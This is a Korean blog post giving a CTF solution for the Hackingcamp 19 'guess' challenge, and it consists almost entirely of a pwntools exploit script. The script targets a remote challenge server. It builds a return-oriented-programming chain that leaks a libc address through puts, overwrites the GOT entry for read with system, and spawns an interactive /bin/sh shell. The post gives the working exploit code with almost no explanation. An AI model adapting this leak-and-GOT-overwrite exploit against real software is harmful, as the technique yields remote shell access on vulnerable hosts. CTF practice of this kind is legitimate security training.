[Hackingcamp 19] guess

728x90

from pwn import *
import os

rand_value = int(os.urandom(4).encode('hex'), 16) % 500 

#s = process("./guess")
s = remote("pwnable.shop",10003)
libc = ELF("./libc")
elf = ELF("./guess")

pop_rsi_r15 = 0x00400761
pop_rdi = 0x00400763

s.recvuntil("Input String!")

pay = p64(0x00400778)*65
pay += p64(0x00400763)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])

s.send(pay)

print s.recvline()
leak = u64(s.recv(6)+'\x00\x00')
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['puts']
one_shot = leak = libc_base + 0xf1147
print "libc_base : " + hex(libc_base)
print "one_shot : " + hex(one_shot)
system = libc_base + libc.symbols['system']

s.send("/bin/sh\x00")

s.send(p64(system))

s.interactive()

저작자표시 비영리 변경금지

'PWN > CTF' 카테고리의 다른 글

[WITHCON 2016] malloc (0)	2019.02.26
[Hackingcamp 19] ucanfind (0)	2019.02.20
[Hackingcamp 19] Orange (0)	2019.02.20
[Hackingcamp 19] sms_service (0)	2019.02.20
[Asis 2015] math sequence (0)	2019.02.15

JIWON J1W0N

[Hackingcamp 19] guess

PWN/CTF 2019. 2. 20. 10:50

티스토리툴바